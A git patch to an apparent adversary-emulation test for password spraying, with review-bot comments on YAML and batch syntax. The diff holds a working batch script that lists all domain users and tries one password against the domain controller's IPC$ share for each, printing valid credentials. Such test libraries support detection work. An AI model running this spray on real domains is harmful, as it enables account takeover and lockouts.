From a084ff4ae60a435e48cc8776b7587973a7ee595d Mon Sep 17 00:00:00 2001
From: clr2of8
Date: Thu, 25 Jun 2020 19:27:02 -0600
Subject: [PATCH] some cleanup
---
 atomics/T1110.003/T1110.003.yaml | 24 ++++++++++++++++++------
 1 file changed, 18 insertions(+), 6 deletions(-)
diff --git a/atomics/T1110.003/T1110.003.yaml b/atomics/T1110.003/T1110.003.yaml
index 6344e04c..621b858a 100644
--- a/atomics/T1110.003/T1110.003.yaml
+++ b/atomics/T1110.003/T1110.003.yaml
@@ -1,8 +1,15 @@
 attack_technique: T1110.003
 display_name: 'Brute Force: Password Spraying'
 atomic_tests:
-- name: Password Spray all domain users
- description: This atomic will create a list of all domain users in the temp directory called users.txt. It will then attempt to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the list. It will print successful authentications to the screen.
+- name: Password Spray all Domain Users
+ description:
+ CAUTION! Be very careful to not exceed the password lockout threshold for users in the domain by running this test too frequently.
+
+ This atomic attempts to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the %temp%\users.txt list.
+ Any successful authentications will be printed to the screen with a message like "[*] username:password". No output will be received if no successful
+ authentications occur. Use the input arguments to specify your own password to use for the password spray.
+
+ Use the get_prereq_command's to create a list of all domain users in the temp directory called users.txt.
 supported_platforms:
 - windows
 input_arguments:
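Review bot: The new multi-paragraph description is written as a plain (unquoted) multi-line scalar, which is fragile: any future edit that starts a continuation line with `- `, `# ` or that contains `: ` will change the parse or fail it, and line folding inside each paragraph is implicit. Writing it as `description: |` (or `>-` if folded paragraphs are intended) keeps the CAUTION paragraph and the blank-line breaks explicit and safe. The last sentence has a stray apostrophe: `Use the get_prereq_command's to create ...` should read `Use the get_prereq_command to create ...`. Since the described success message prints `username:password` pairs, it would help operators to add one sentence such as `Successful pairs are valid domain credentials; treat the console output and any captured execution logs accordingly.`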
@@ -10,14 +17,19 @@ atomic_tests:
 description: The password to try for each user in users.txt
 type: string
 default: Spring2020
- executor:
- command: |-
+ dependencies:
+ - description: | List of domain users to password spray must exits at %tempe%\users.txt
+ prereq_command: |
+ if not exist %temp%\users.txt (exit /b 1)
+ get_prereq_command: |
 rem Create the users.txt by parsing the "net users /domain" output
 del %temp%\1.txt >nul 2>&1 & del %temp%\2.txt >nul 2>&1 & del %temp%\3.txt >nul 2>&1 & del %temp%\users.txt >nul 2>&1
 @FOR /F "skip=6 delims=" %a in ('net users /domain ^| findstr /vc:"The command c"') do @set line=%a & @call echo %^line: =,% >> %temp%\1.txt
 @FOR /F "delims=" %a in (%temp%\1.txt) do @set line=%a & @call echo %^line:, =,% >> %temp%\2.txt
 @FOR /F "tokens=1-3 delims=," %n in (%temp%\2.txt) do @echo %n >> %temp%\3.txt & @echo %o >> %temp%\3.txt & @echo %p >> %temp%\3.txt
 @FOR /F "tokens=*" %a in ('type %temp%\3.txt ^| findstr /vc:"ECHO is on."') do @echo %a >> %temp%\users.txt
- rem Execute the password spray, trying the password set above for every user in the domain
+ executor:
+ command: |-
 @FOR /F %n in (%temp%\users.txt) do @net use %logonserver%\IPC$ /user:"%userdomain%\%n" "#{password}" 1>NUL 2>&1 && @echo [*] %n:#{password} && @net use /delete %logonserver%\IPC$ > NUL
- name: powershell
\ No newline at end of file
+ name: command_prompt
\ No newline at end of file
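Review bot: The new dependency description names a variable that does not exist and has a typo: `List of domain users to password spray must exits at %tempe%\users.txt` should read `List of domain users to password spray must exist at %temp%\users.txt`, matching the path that `prereq_command` actually checks. The block scalars are also inconsistent: `prereq_command: |` and `get_prereq_command: |` keep a trailing newline while `command: |-` strips it; unless the runner relies on that newline, `|-` throughout would be clearer. The check `if not exist %temp%\users.txt (exit /b 1)` will misparse if the expanded %temp% path contains a space, so `if not exist "%temp%\users.txt" (exit /b 1)` is safer. The file still ends without a trailing newline after the new `name: command_prompt` line.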